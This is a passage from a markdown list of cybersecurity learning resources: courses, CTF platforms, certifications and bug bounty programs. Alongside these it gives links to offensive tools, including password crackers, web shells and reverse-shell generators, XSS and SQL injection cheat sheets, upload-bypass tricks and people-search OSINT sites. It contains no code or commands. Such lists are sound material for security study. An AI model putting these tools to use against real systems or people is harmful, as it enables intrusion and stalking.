cybersecurity figures. - [SecurityNow](https://twit.tv/shows/security-now) Cybercrime news, hacking, and web application security. - [Infosec Institute](https://www.youtube.com/user/InfoSecInstitute/videos) Cybersecurity awareness. - [InfoSec Live](https://www.youtube.com/c/infoseclive) Everything cybersecurity related from tutorials to interviews. - [The PC Security Channel](https://www.youtube.com/channel/UCKGe7fZ_S788Jaspxg-_5Sg) Windows security, malware news, and tutorials. - [David Bombal](https://www.youtube.com/channel/UCP7WmQ_U4GB3K51Od9QvM0w) Everything cybersecurity related. #### Tech Reviewers/PC Building/Consumer Tech - [Barnacules Nerdgasm](https://www.youtube.com/channel/UC1MwJy1R0nGQkXxRD9p-zTQ) Tech reviewer, hardware tutorials. - [Linus Tech Tips](https://www.youtube.com/user/LinusTechTips) Hardware tutorials, tech reviewer, PC building. - [ThioJoe](https://www.youtube.com/channel/UCQSpnDG3YsFNf5-qHocF-WQ) Hardware tutorials, tech reviewer, PC building. - [Elithecomputerguy](https://www.youtube.com/c/Elithecomputerguypage/playlists) Hardware tutorials, network tutorials, hardware reviewer, hacking tutorials, Linux tutorials, website development. - [Joe Collins](https://www.youtube.com/channel/UCTfabOKD7Yty6sDF4POBVqA)Everything Linux related, including tutorials and guides - [Network Chuck](https://networkchuck.com/): All-around networking YouTuber - [Professor Messer](https://www.youtube.com/c/professormesser) Hardware Networking and Security Certifications Youtubers. Has extensive resources on CompTIA certifications ### Podcasts - [Darknet Diaries](https://darknetdiaries.com/) - [SimplyCyber](https://www.simplycyber.io/) - [Smashing Security](https://www.smashingsecurity.com/) - [Hacking Humans](https://thecyberwire.com/podcasts/hacking-humans) - [Fraudology](https://podcasts.apple.com/us/podcast/fraudology-podcast-with-karisse-hendrick/id1530461089) - [The Brett Johnson Show](https://www.thebrettjohnsonshow.com/) - [What The Shell](https://whattheshellpod.com/) - [The Hacker Mind](https://thehackermind.com/) ## Hacking and Security Challenges ### Capture the Flag (CTF) Challenges - [TryHackMe](https://tryhackme.com/) Highly recommended for beginners. They have many good free tutorials and detailed walkthroughs for many rooms. - [HackThisSite](https://www.hackthissite.org/) Focuses primarily on web exploit challenges. - [HackTheBox](https://www.hackthebox.eu/) Virtual machines available for download to practice hacking. Offers both beginner-friendly and advanced content. - [Juice Shop](https://juice-shop.herokuapp.com/#/) An intentionally vulnerable web application developed by OWASP for hands-on learning of web application security. - [HackerOne](https://www.hackerone.com/) Web hacking challenges and bug bounty program platform. - [CyberSecLabs](https://www.cyberseclabs.co.uk/) An online platform offering cybersecurity challenges and labs for hands-on practice and learning. - [WebScanTest](http://www.webscantest.com/) A website/application that allows users to test and analyze the security of web applications through vulnerability assessments and penetration testing. - [PortSwigger](http://www.portswigger.net) Web hacking CTFs and challenges and extensive resources on learning web application security - [CrackMe](http://crackme.cenzic.com/Kelev/view/home.php) Contains various Small programs or applications to download designed to test a user's reverse engineering and software cracking skills. ### Bug Bounty Programs - [HackerOne](https://www.hackerone.com/) One of the largest bug bounty platforms with diverse programs and well-known clients. Offers rewards for security vulnerabilities in various applications - [Bugcrowd](https://www.bugcrowd.com/) Crowdsourced platform that connects ethical hackers with companies seeking vulnerability assessments. Offers programs from startups to enterprises - [Synack](https://www.synack.com/) Hybrid platform that combines human and AI-powered security testing. Offers continuous monitoring and has a private network of skilled researchers - [Open Bug Bounty](https://www.openbugbounty.org/) Unique platform with a focus on responsible disclosure. Allows researchers to report vulnerabilities to websites without fear of legal consequences - [YesWeHack](https://www.yeswehack.com/) European bug bounty platform with a wide range of programs and collaboration with cybersecurity experts. Offers a Responsible Disclosure program for non-monetary rewards - [Zerodium](https://zerodium.com/program.html) Zerodium pays BIG bounties to security researchers to acquire their original and previously unreported zero-day research ### Vulnerable Software: - [VulnHub](https://www.vulnhub.com/) Virtual machines available for download to practice hacking. - [Exploit-DB](http://www.exploit-db.com/webapps/) Database of exploits and vulnerability information. - [OWASP SiteGenerator](http://www.owasp.org/index.php/Owasp_SiteGenerator) A project by OWASP that helps generate vulnerable web applications for learning and testing web application security. - [McAfee Hacme](http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx), [Hacme Casino](http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx), [Hacme Shipping](http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx), [Hacme Travel](http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx): Deliberately vulnerable web applications developed by McAfee for practicing security testing and identifying vulnerabilities. - [OldApps](http://www.oldapps.com/) Provides archived versions of software applications for compatibility or nostalgic purposes. - [OldVersion](http://www.oldversion.com/) Provides archived versions of software applications for compatibility or nostalgic purposes. ### Hacking Techniques #### Google Hacking and Dorking: * http://www.stachliu.com/index.php/resources/tools/google-hacking-diggity-project/ - Google Hacking and Dorking software * http://midnightresearch.com/projects/search-engine-assessment-tool/#downloads - Search engine vulnerability assessment * http://sqid.rubyforge.org/#next - SQL Injection Digger * http://voidnetwork.org/5ynL0rd/darkc0de/python_script/dorkScan.html - Python dork scanning tool #### Wireless * http://code.google.com/p/pyrit/ * http://www.oact.inaf.it/ws-ssri/Costa.pdf - Wireless Network Hacking PDF. * http://packetstormsecurity.org/papers/wireless/cracking-air.pdf - Cracking the Wireless Encryption PDF #### Password and Hash Cracking Tutorials - [Security and Password Exploitation Class](http://www.irongeek.com/i.php?page=videos/password-exploitation-class) - [Default Passwords for Various Vendors and Software](http://cirt.net/passwords) - [Tutorial on Cracking Passwords Using Medusa](http://www.foofus.net/~jmk/medusa/medusa-smbnt.html) - [Tutorial on Cracking Hashes Using Medusa](http://www.foofus.net/?page_id=63) - [Blog About Cracking Hashes and Passwords](http://hashcrack.blogspot.com/) - [How to Find Passwords and Hashes in a System](http://www.nirsoft.net/articles/saved_password_location.html) - [Default Passwords](http://www.virus.org/default-password) - [Online Hash Cracker](http://www.phenoelit-us.org/dpl/dpl.html) - [Cracking Hashes and Passwords with Ncrack](http://nmap.org/ncrack/) - [Hacking Tutorials Using Medusa](http://www.foofus.net/~jmk/medusa/medusa.html) - [Password Cracking with John the Ripper](http://www.openwall.com/john/) - [Tutorials on Using Ophcrack](http://ophcrack.sourceforge.net/) - [Hacking Tutorials with Keimpx](http://blog.0x3f.net/tool/keimpx-in-action/) - [Detection and Exploitation of SMB Default Credentials](http://code.google.com/p/keimpx/) - [Cracking Hashes with GPU Acceleration](http://sourceforge.net/projects/hashkill/) #### Password and Hash Cracking in the Browser: - [Online Website for Hash Cracking](https://crackstation.net/) - [Tool for Cracking Various Hash Types](http://www.onlinehashcrack.com/) - [Decode Base64 Encoded Hashes](https://www.base64encode.org/) - [Tool to Decode Encoded Hashes](https://www.base64encode.net/) #### Wordlists * [Seclists](https://github.com/danielmiessler/SecLists) is one of the most well-known sets of wordlists. Referenced in many CTFS * [Korelogic](http://contest.korelogic.com/wordlists.html) * [PacketStorm](http://packetstormsecurity.org/Crackers/wordlists/) * [Skullsecurity](http://www.skullsecurity.org/wiki/index.php/Passwords) * [Wordbook](http://wordbook.xyz/download/) #### Pass the Hash * http://www.sans.org/reading_room/whitepapers/testing/pass-the-hash-attacks-tools-mitigation_33283 * http://www.sans.org/reading_room/whitepapers/testing/crack-pass-hash_33219 #### MiTM (Man in the Middle) : * http://media.techtarget.com/searchUnifiedCommunications/downloads/Seven_Deadliest_UC_Attacks_Ch3.pdf - 7 Deadliest UC Attacks PDF. * http://www.blackhat.com/presentations/bh-europe-03/bh-europe-03-valleri.pdf - MITM BlackHat talk * http://www.irongeek.com/i.php?page=videos/ettercap-plugins-find-ip-gw-discover-isolate - Ettercap Plugins video. * http://www.irongeek.com/i.php?page=videos/ettercapfiltervid1 - Tutorial on Ettercap Filters video * http://articles.manugarg.com/arp_spoofing.pdf - ARP Spoofing paper #### Active Directory * [Deep dive into Active directory](https://zer1t0.gitlab.io/posts/attacking_ad/) Attacking Active Directory: 0 to 0.9 * [Active Directory Mindmap](https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2023_02.svg) In-depth active directory Mindmap by orange-cyberdefense #### Metasploit: - [Metasploit Exploitation Framework](http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training) - Exploiting with the power of the Metasploit framework - [Irongeek Metasploit Course](http://www.irongeek.com/i.php?page=videos/metasploit-class) - Introduction to exploitation with Metasploit ## Programming - [edX](https://www.edx.org/) Provides various free programming courses from universities. - [freeCodeCamp](https://www.freecodecamp.org/) A free website for learning web development and Python. FOcuses extensively on Front end and back-end web development - [Udemy](https://www.udemy.com/) Offers career training courses, some of which are free. - [Khan Academy](https://www.khanacademy.org/) Provides courses on math, English, and computer programming in a fun gamified way for free. - [MIT OpenCourseWare](https://ocw.mit.edu/courses/intro-programming/) Free intro to programming course released by MIT. - [Code.Google](http://code.google.com/edu/languages/google-python-class/index.html) Google's Python class tutorials. - [Swaroopch](http://www.swaroopch.com/notes/Python_en:Table_of_Contents) Python tutorials by Swaroop. - [TheNewBoston](http://www.thenewboston.com/?cat=40&pOpen=tutorial) Programming tutorials and resources. - [Hackerrank](https://www.hackerrank.com/) Coding challenges and competitions. - [Sololearn](https://www.sololearn.com/) Offers interactive coding lessons for various programming languages. - [Codecademy](https://www.codecademy.com/) Provides interactive coding lessons. - [Coursera](https://www.coursera.org/) Offers career development courses, both paid and free. - [DevDocs](https://devdocs.io/) Comprehensive documentation for various programming languages and technologies. - [W3Schools](https://www.w3schools.com/) Provides web development tutorials and references. - [GitHub](https://github.com/) Code sharing and collaboration platform. - [PythonAnywhere](https://www.pythonanywhere.com/) Online Python development and hosting platform. - [CS50](https://cs50.harvard.edu/college/2020/fall/) Well-known free course for introduction to programming. - [HackerRank](https://www.hackerrank.com/) Offers coding challenges and competitions. - [SoloLearn](https://www.sololearn.com/) Provides interactive coding lessons for various programming languages. - [Khan Academy](https://www.khanacademy.org/) Highly recommended resource with lots of free courses in programming, computer science, math, English, etc. - [DevDocs](https://devdocs.io/) Comprehensive documentation for various programming languages and technologies. - [W3Schools](https://www.w3schools.com/) Provides web development tutorials and references. - [TheNewBoston](https://www.youtube.com/user/thenewboston) Programming tutorials (web development - front end and back end, python, ruby). - [The Net Ninja](https://www.youtube.com/c/TheNetNinja/playlists) Front-end and Back-End web development tutorials - [Derek Banas](https://www.youtube.com/c/derekbanas/playlists) Tutorials on almost every kind of programming you can imagine. - [Traversy Media](https://www.youtube.com/c/TraversyMedia/playlists) Python, Web Development, and various programming tutorials - [Programming with Mosh](https://www.youtube.com/channel/UCWv7vMbMWH4-V0ZXdmDpPBA) Programming Tutorials for various languages ## Linux - [Linux Training Academy](https://www.linuxtrainingacademy.com/linux-commands-cheat-sheet/): Cheat sheet for useful command-line tools. - [TryHackMe](https://tryhackme.com/) Website for beginners and advanced users to learn about Linux and more. - [Linux Journey](https://linuxjourney.com/) A hands-on step-by-step process for learning how to use Linux. - [Compute Freely](https://computefreely.org/) Resources for learning about Linux and open-source software. - [Linux Newbie Guide](https://linuxnewbieguide.org/overview-of-chapters/) Provides an overview of Linux and its features. - [Null Byte Linux Basics](https://null-byte.wonderhowto.com/how-to/linux-basics/) A series of free Linux basic tutorials. - [UbuntuPIT](https://www.ubuntupit.com/best-linux-commands-to-run-in-the-terminal/) List of 50 very useful Linux commands. - [Linux for Ethical Hackers](https://www.youtube.com/watch?v=U1w4T03B30I) YouTube video series on Linux for ethical hackers. - [FreeCodeCamp Linux Crash Course](https://www.youtube.com/watch?v=ROjZy1WbCIA&t=3867s) YouTube beginner crash course in Linux. - [Linux Server Course](https://www.youtube.com/watch?v=WMy3OzvBWc0) YouTube course on Linux server system configuration and operation. - [Switched to Linux](https://www.youtube.com/channel/UCoryWpk4QVYKFCJul9KBdyw) Linux tutorials and stuff Linux related. - [TheLinuxGamer](https://www.youtube.com/user/TheLinuxgamer) Linux gaming, Linux tutorials, photo editing, music editing, programming, and some hacking tutorials ## Networking - [Professor Messer's Network+ Training Course](https://www.youtube.com/playlist?list=PLG49S3nxzAnksQpejrRxNZoRSo0pcKXkG) Highly recommended network+ training course on YouTube. - [FreeCodeCamp Networking Course](https://www.youtube.com/watch?v=qiQR5rTSshw&t=7212s) Networking course by freeCodeCamp and Network+ preparation. - [Network Chuck Networking Course/CCNA Training](https://www.youtube.com/playlist?list=PLIhvC56v63IJVXv0GJcl9vO5Z6znCVb1P) Networking course by Network Chuck/CCNA training course. ## Certifications ### Hardware - [CompTIA A+](https://www.comptia.org/certifications/a) General hardware certification with a wide range of job offerings Cost Low/Mid (USD $300-400) - [Professor Messer A+ Course](https://www.youtube.com/watch?v=87t6P5ZHTP0&list=PLG49S3nxzAnnOmvg5UGVenB_qQgsh01uC) YouTube course by Professor Messer on A+ certification. - [Apple Certified Macintosh Technician](https://www.thenewit.com/go-apple-technician-training/apple-certified-mac-technician) Apple-specific hardware certification Cost High (USD $2,800) ### Networking - [CompTIA Network+](https://www.comptia.org/certifications/network) Networking certification the Cost is Low/Mid (USD $300-400) - [Professor Messer Network+ Course](https://www.youtube.com/watch?v=As6g6IXcVa4&list=PLG49S3nxzAnlCJiCrOYuRYb6cne864a7G) Free YouTube course by Professor Messer on Network+ certification. - [Udemy Network+ Course](https://www.udemy.com/course/comptia-network-n10-008/) Paid course on Udemy for Network+ certification. The Cost is Low (USD $20-30) ### Linux - [CompTIA Linux+](https://www.comptia.org/certifications/linux) CompTia Certification for Linux Cost is Low/Mid (USD $300-400) ### Security - Entry Level - [CompTIA Security+](https://www.comptia.org/certifications/security) Comptia Entry-level security certification Cost is Low/Mid (USD $300-400) - Stay Tuned for a Security + study guide - [CEH](https://www.eccouncil.org/train-certify/certified-ethical-hacker-ceh/) Certified Ethical Hacker certification. This is for the multiple-choice exam. The Cost is High (USD $1200) ### Security - Management Level - [CISSP](https://www.isc2.org/Certifications/CISSP) Certified Information Systems Security Professional Cost Mid ($USD 700-800) ### Penetration Testing - [CompTIA PenTest+](https://www.comptia.org/certifications/pentest) Certification focusing on penetration testing methodology The Cost is Low/Mid (USD $300-400) - [PNPT](https://certifications.tcm-sec.com/pnpt/) Hands-on exam from TheCyberMentor (Heath Adams) covering active directory external penetration testing and privilege escalation Cost Low/Mid (USD $300-400) - [EJPT](https://elearnsecurity.com/product/ejpt-certification/) Practical exam for penetration testing The Cost is Low/Mid (USD $300-400) - [CEH Master](https://www.eccouncil.org/train-certify/ceh-master/) Practical CEH exam Cost is really high (USD $4,670) including CEH multiple-choice and hands-on exams. Typically need college, a scholarship, or work to pay for it. - [OSCP](https://www.offsec.com/courses/pen-200/) Highly recognized penetration testing certification with a focus on manual testing techniques The cost is High (USD $1000-2500) - I will be writing an OSCP study guide soon. - Looking for people to give feedback on SANS certifications ## Web Application Security ### Exploitation Frameworks and Tools - [BeEF](http://www.bindshell.net/tools/beef) - Browser Exploitation Framework - [BlindElephant](http://blindelephant.sourceforge.net/) - Scanner for known vulnerable web apps - [XSSer](http://xsser.sourceforge.net/) - Cross-site Scripting attack tool - [RIPS Scanner](http://sourceforge.net/projects/rips-scanner/) - Scanner for vulnerable PHP apps - [Authforce](http://www.divineinvasion.net/authforce/) - Password cracking tool - [Software Exploitation Toolkit](http://andlabs.org/tools.html#sotf) - Software exploitation toolkit - [SQL Injection Digger](http://carnal0wnage.blogspot.com/2007/07/using-sqid-sql-injection-digger-to-look.html) - SQL Injection Digger search guide - [Pinata CSRF Tool](http://code.google.com/p/pinata-csrf-tool/) - Cross-Site Request Forgery exploration and exploitation tool - [XSSer Introduction](http://xsser.sourceforge.net/#intro) - Cross-site Scripting attack tool - [Clickjacking Attack Tool](http://www.contextis.co.uk/resources/tools/clickjacking-tool/) - Clickjacking attack tool - [Unicode Exploitation Guide](http://packetstormsecurity.org/files/view/69896/unicode-fun.txt) - Unicode exploitation guide - [Web Security Testing Framework](http://sourceforge.net/projects/ws-attacker/files/) - Web security testing framework - [Squid Imposter](https://github.com/koto/squid-imposter) - SSL impostering for MITM attacks ### SQL Injection (SQLi) A vulnerability that permits attackers to manipulate SQL queries to gain unauthorized access, modify, or retrieve sensitive data from a database. - [MSSQL SQL Injection Cheat Sheet](http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/) - [SQL Injection Intro](http://sqlzoo.net/hack/) - [SQL Server Versions](http://www.sqlteam.com/article/sql-server-versions) - [Testing for MS Access](http://www.owasp.org/index.php/Testing_for_MS_Access) - [SQL Injection Video Tutorial](http://www.youtube.com/watch?v=WkHkryIoLD0) ### Upload Tricks Upload web vulnerabilities refer to security flaws that allow malicious users to upload and execute unauthorized files, potentially leading to server compromise or unauthorized access to the system. - [Bypassing Upload File Type](http://www.google.com/#hl=en&q=bypassing+upload+file+type&start=40&sa=N&fp=a2bb30ecf4f91972) - [Tricks & Tips: Bypassing Image Uploaders](http://ex.ploit.net/f20/tricks-tips-bypassing-image-uploaders-t3hmadhatt3r-38/) - [Raven PHP Scripts: File Upload Vulnerability](http://www.ravenphpscripts.com/article2974.html) - [Cross-site Scripting Scanner](http://www.acunetix.com/cross-site-scripting/scanner.htm) - [Microsoft Security Advisory: File Upload](http://msdn.microsoft.com/en-us/library/aa478971.aspx) - [TangoCMS Issue 237](http://dev.tangocms.org/issues/237) - [Cross-Site File Upload Attacks](http://www.gnucitizen.org/blog/cross-site-file-upload-attacks/) - [File Upload Security](http://shsc.info/FileUploadSecurity) - [TikiWiki Script File Upload Security Bypass Vulnerability](http://www.ipolicynetworks.com/technology/files/TikiWiki_jhot.php_Script_File_Upload_Security_Bypass_Vulnerability.html) ### LFI/RFI (Local File Inclusion/Remote File Inclusion) Allows an attacker to include files from the target system or remote servers, potentially leading to unauthorized access or code execution. - [Online Source Code for LFI/RFI Vulnerability](http://pastie.org/840199) - [Understanding File-access Denial Exploits](http://www.digininja.org/blog/when_all_you_can_do_is_read.php) ### XSS (Cross-site Scripting) An attack where malicious scripts are injected into web pages, affecting users who visit the page and potentially stealing their data or taking control of their accounts. - [Cross-site Scripting Tutorial](http://www.infosecwriters.com/hhworld/hh8/csstut.htm) - [Basic Tutorial on XSS](http://www.technicalinfo.net/papers/CSS.html) - [Comprehensive Guide to XSS Attack and Defense](http://forum.intern0t.net/web-hacking-war-games/112-cross-site-scripting-attack-defense-guide.html) - [Filter Evasion Houdini on the Wire](http://www.securityaegis.com/filter-evasion-houdini-on-the-wire/) - [Javascript-based XSS Cheat Sheet](http://heideri.ch/jso/#javascript) - [Subreddit for XSS](http://www.reddit.com/r/xss/) - [XSS Discussions](http://sla.ckers.org/forum/list.php?2) ### Metasploit - [WmapNikto - Metasploit](http://code.google.com/p/msf-hack/wiki/WmapNikto) - [Metasploit Mailing List](http://seclists.org/metasploit/) - [Meterpreter](http://meterpreter.illegalguy.hostzi.com/) - [Metasploit Video Tutorial](http://www.securitytube.net/video/711) - [Meterpreter Client](http://en.wikibooks.org/wiki/Metasploit/MeterpreterClient#download) - [Fast and Easy Hacking with Metasploit](http://www.fastandeasyhacking.com/) ### Metadata - [Document Metadata: The Silent Killer](http://www.sans.org/reading_room/whitepapers/privacy/document-metadata-silent-killer_32974) - [Strikeout](http://lcamtuf.coredump.cx/strikeout/) - [ExifTool](http://www.sno.phy.queensu.ca/~phil/exiftool/) - [Metagoofil](http://www.edge-security.com/metagoofil.php) ### OSINT (Open-source Intelligence) - [theHarvester](http://www.edge-security.com/theHarvester.php) - [DNSTracer](http://www.mavetju.org/unix/dnstracer-man.php) - [Paterva Maltego](http://www.paterva.com/web5/) ### Shells - [Yokoso](http://sourceforge.net/projects/yokoso/) - [AjaxShell](http://sourceforge.net/projects/ajaxshell/) - [R57](https://r57.gen.tr/) - [Revshells](https://www.revshells.com/) ### Attack Strings - [FuzzDB](http://code.google.com/p/fuzzdb/) - [OWASP Fuzzing Code Database](http://www.owasp.org/index.php/Category:OWASP_Fuzzing_Code_Database#tab=Statements) ### Scanners - [w3af](http://w3af.sourceforge.net/) - Open-source web application security scanner. - [Skipfish](http://code.google.com/p/skipfish/) - Automated web application security audit tool. - [sqlmap](http://sqlmap.sourceforge.net/) - Automated SQL injection and database takeover tool. - [SQID](http://sqid.rubyforge.org/#next) - Web application security library. - [Cross-Site Scripting Scanner](http://packetstormsecurity.org/UNIX/scanners/XSSscan.py.txt) - [Unauthorized Web Server Access Scanner](http://code.google.com/p/fimap/wiki/WindowsAttack) - [Web Vulnerability Scanner](http://code.google.com/p/fm-fsf/) - [Burp Suite](http://www.portswigger.net/burp/) - Web vulnerability scanner and testing tool. - [Belch](http://sourceforge.net/projects/belch/files/) - Web vulnerability scanner. - [Burp Intruder: Fuzzing Approach to Credentials Discovery](http://www.sans.org/reading_room/whitepapers/testing/fuzzing-approach-credentials-discovery-burp-intruder_33214) ### Net Scanners and Scripts - [Nmap](http://nmap.org/) - Network mapping and port scanning tool - [SambaScan2](http://asturio.gmxhome.de/software/sambascan2/i.html) - Windows-based shell script for discovering LanMan/NTLM authentication information - [SoftPerfect Network Scanner](http://www.softperfect.com/products/networkscanner/) - Network scanner tool - [OpenVAS](http://www.openvas.org/) - Vulnerability scanner and management - [Nessus](http://tenable.com/products/nessus) - Vulnerability scanner and management - [Rapid7 Vulnerability Scanner](http://www.rapid7.com/vulnerability-scanner.jsp) - Vulnerability scanner and management - [Retina Community](http://www.eeye.com/products/retina/community) - Vulnerability scanner ## Content Management System (CMS) Hacking Content Management Systems (CMS) are popular platforms used to manage, create, and modify digital content on websites and web applications. While they provide convenience and flexibility, improper configuration and vulnerabilities can lead to security risks. Ethical hacking (penetration testing) of CMSs is essential to identify weaknesses and implement robust security measures. However, it is crucial to obtain proper authorization before conducting any testing. Here's an overview of popular CMS platforms and resources for ethical hacking: ### WordPress: - [**WordPress**](https://wordpress.com/) A widely used open-source CMS for websites and blogs. - [**WPScan**](https://wpscan.com/) WordPress vulnerability scanner. - [**Securi Wordpress Guide**](https://sucuri.net/guides/wordpress-security/) Official security guide by WordPress. - [**OWASP WordPress Security Implementation Guideline**](https://secure.wphackedhelp.com/blog/wordpress-security-checklist-guide/) OWASP WordPress Security Cheat Sheet. ### Drupal: - [**Drupal**](https://www.drupal.org/) An open-source CMS known for flexibility and scalability. - [**Drupal Security**](https://www.drupal.org/security) Official security page for Drupal with advisories. - [**Guide on Drupal Security**](https://www.keycdn.com/blog/drupal-security). ### ColdFusion: - [**ColdFusion Directory Traversal FAQ (CVE-2010-2861)**](https://www.exploit-db.com/exploits/14641)Information about major ColdFusion vulnerability. - [**Attacking ColdFusion**](https://pentest.tonyng.net/attacking-adobe-coldfusion/) Insights into attacking ColdFusion applications. ### Joomla: - [**Joomla**](https://www.joomla.org/) A popular open-source CMS with extensibility features. - [**Joomla Security**](https://docs.joomla.org/Security_Checklist/Joomla!_Setup) Security checklist and guidelines from Joomla. ### Magento: - [**Magento**](https://business.adobe.com/products/magento/magento-commerce.html) An e-commerce-focused open-source CMS. - [**Magento Security Best Practices**](https://www.adobe.com/content/dam/cc/en/trust-center/ungated/whitepapers/experience-cloud/adobe-commerce-best-practices-guide.pdf) Security best practices from Magento. ### Shopify: - [**Shopify**](https://www.shopify.com/) A hosted CMS for e-commerce solutions. - [**Shopify Security**](https://help.shopify.com/en/manual/your-account/account-security) Security measures and guidelines provided by Shopify. ### Wix: - [**Wix**](https://www.wix.com/) Cloud-based website builder with drag-and-drop tools. - [**Wix Security**](https://www.wix.com/website-security) Wix's security measures and policies. ### Squarespace: - [**Squarespace**](https://www.squarespace.com/) A website builder with visually appealing templates. - [**Squarespace Security**](https://www.squarespace.com/security) Security practices and protocols from Squarespace. ### Typo3: - [**Typo3**](https://typo3.org/) An enterprise-level open-source CMS known for scalability. - [**Typo3 Security**](https://typo3.org/community/teams/security) Typo3 security guide. ### Umbraco: - [**Umbraco**](https://umbraco.com/) An open-source CMS based on Microsoft's ASP.NET framework. - [**Umbraco Security**](https://umbraco.com/blog/category/security/) Security information and guidelines from Umbraco. ### Ghost: - [**Ghost**](https://ghost.org/) A CMS designed for bloggers and writers. - [**Ghost Security**](https://ghost.org/docs/security/) Security concepts and practices for Ghost. ## Cybersecurity Tools section in progress ## Cloud Security ### Cloud Security Resources: - [Cloud Security Alliance (CSA)](https://cloudsecurityalliance.org/) A non-profit organization focused on promoting best practices for cloud security and providing education and guidance. - [Microsoft Cloud Security](https://www.microsoft.com/en-us/trustcenter/security) Microsoft's official cloud security page, offers information on Azure security and compliance. - [AWS Security](https://aws.amazon.com/security/) Amazon Web Services (AWS) security center, providing resources and best practices for securing cloud environments on AWS. - [Google Cloud Security](https://cloud.google.com/security) Google Cloud's security page, with information on securing applications and data on Google Cloud Platform. - [Cloud Security by Oracle](https://www.oracle.com/cloud/security/) Oracle Cloud's security resources, including whitepapers and best practices for securing cloud deployments. - [NIST Cloud Computing Security](https://www.nist.gov/programs-projects/cloud-computing) National Institute of Standards and Technology (NIST) publications and guidelines on cloud computing security. - [CSO Online - Cloud Security](https://www.csoonline.com/category/cloud-security/) Articles and news on cloud security from CSO Online. - [Cloud Security Blogs](https://blog.feedspot.com/cloud_security_blogs/) A collection of top cloud security blogs, providing insights and updates on cloud security trends. - [Cloud Security Podcasts](https://www.cloudsecuritypodcast.tv/) A podcast series focused on cloud security topics and discussions. - [SANS Institute Cloud Security Training](https://www.sans.org/cloud-security-training) Cloud security courses and training offered by the SANS Institute. - [Azure Fundamentals from youtube](https://www.youtube.com/playlist?list=PLGjZwEtPN7j-Q59JYso3L4_yoCjj2syrM) this section is still in progress ## Digital Forensics this section is still in progress ## Operating systems * [Kali Linux](https://www.kali.org) is the most common operating system used for ethical hacking. Best for all levels has the most tutorials and support and the largest community. Note various cybersecurity courses assume you are utilizing Kali including offensive security and pnpt/tcm * [Parrot Security OS](http://www.parrotsec.org/) Similar to kali . easy to use but not as much support as Kali * [BlackArch Linux](http://www.blackarch.org/) very customizable version of Linux, with a very steep learning curve but is still very powerful * For more info on individual Operating Systems see [distrowatch](https://distrowatch.com/) ### ISOS An ISO is a virtual "box" that contains all the necessary files and data to set up a computer system or an operating system. ISO files are typically used to distribute software, including operating systems like Windows or Linux. #### Windows ISO images from Microsoft * [Windows 10 iso image](https://www.microsoft.com/en-us/software-download/windows10) * [Windows 8 iso image](https://www.microsoft.com/en-us/software-download/windows8ISO) * [Windows 7 iso image](https://www.microsoft.com/en-us/software-download/windows7) #### Linux ISO images Common Linux Distros * [Debian](https://www.debian.org/CD/http-ftp/) Stable and open-source OS with vast software repositories * [Ubuntu](https://ubuntu.com/download)User-friendly Linux OS based on Debian with frequent updates * [Linux Mint](https://linuxmint.com/download.php) Accessible OS, great for beginners, based on Ubuntu * [Arch](https://archlinux.org/download/) Lightweight and customizable Linux OS, preferred by experienced users * [For more info on other Operating Systems](https://distrowatch.com/) ### Virtual machine software and virtualization * [VirtualBox](https://www.virtualbox.org/) windows mac and Linux * [Vmware](https://www.vmware.com/) Vmware workstation windows mac and Linux * [Wine](https://www.winehq.org/) emulator for running windows applications on Linux, macOS, & BSD (not a virtual machine) Instead of simulating internal Windows logic like a virtual machine or emulator, Wine translates Windows API calls into POSIX calls on the fly, eliminating the performance and memory penalties of other methods and allowing you to cleanly integrate Windows applications into your desktop. ## Osint OSINT (Open Source Intelligence) -The practice of collecting information from published or otherwise publicly available sources ### People and Organizational * http://www.spokeo.com/ - locate people using online search * http://www.123people.com/ - search engine for people * http://www.xing.com/ - online networking platform * http://www.zoominfo.com/search - business information search * http://pipl.com/ - search engine mainly for people * http://www.zabasearch.com/ - people and business search engine * http://www.searchbug.com/default.aspx - Contact and services search engine * http://theultimates.com/ - people and business search * http://skipease.com/ - public records search * http://addictomatic.com/ - search topics and key phrases * http://socialmention.com/ - see how often a phrase is mentioned * http://entitycube.research.microsoft.com/ - link entities to other sources * http://www.yasni.com/ - search engine of people and business * http://tweepz.com/ - search and find Twitter profiles * http://tweepsearch.com/ - Tweet search engine * http://www.glassdoor.com/index.htm - search for employers and salaries * http://www.jigsaw.com/ - Business information exchange * http://searchwww.sec.gov/EDGARFSClient/jsp/EDGAR_MainAccess.jsp - public trading and financial documents * http://www.tineye.com/ - search for images * http://www.peekyou.com/ - online people search * http://picfog.com/ - search engine for images * http://twapperkeeper.com/index.php - Twitter archival search ### Infrastructure: * https://searchdns.netcraft.com/ - DNS lookup provider * https://securityheaders.com/ - Secure HTTP response headers scanner * http://uptime.netcraft.com/ - Website uptime checking * http://www.domaintools.com/ - Domain information provider * http://centralops.net/co/ - DNS and IP information lookup * http://hackerfantastic.com/ - Website security scanning * http://whois.webhosting.info/ - WHOIS lookup tool * https://www.ssllabs.com/ssldb/analyze.html - SSL security assessment * http://www.clez.net/ - IP address intelligence * http://www.my-ip-neighbors.com/ - IP relationships explorer * https://www.shodan.io/ - IoT device search engine * http://www.exploit-db.com/google-dorks/ - Vulnerability search engine * http://www.hackersforcharity.org/ghdb/ - Security knowledgebase ## References and Cheatsheets * [http://en.wikipedia.org/wiki/IPv4_subnetting_reference](http://en.wikipedia.org/wiki/IPv4_subnetting_reference) * [http://www.nixtutor.com/linux/all-the-best-linux-cheat-sheets/](http://www.nixtutor.com/linux/all-the-best-linux-cheat-sheets/) * [http://shelldorado.com/shelltips/beginner.html](http://shelldorado.com/shelltips/beginner.html) * [http://www.linuxsurvival.com/](http://www.linuxsurvival.com/) * [http://mywiki.wooledge.org/BashPitfalls](http://mywiki.wooledge.org/BashPitfalls) * [http://rubular.com/](http://rubular.com/) * [http://www.iana.org/assignments/port-numbers](http://www.iana.org/assignments/port-numbers) * [http://www.robvanderwoude.com/ntadmincommands.php](http://www.robvanderwoude.com/ntadmincommands.php) * [http://www.nixtutor.com/linux/all-the-best-linux-cheat-sheets/](http://www.nixtutor.com/linux/all-the-best-linux-cheat-sheets/) * http://cirt.net/ports_dl.php?export=services - Lists of port services definitions * http://www.cheat-sheets.org/ - Compilation of cheatsheets for a variety 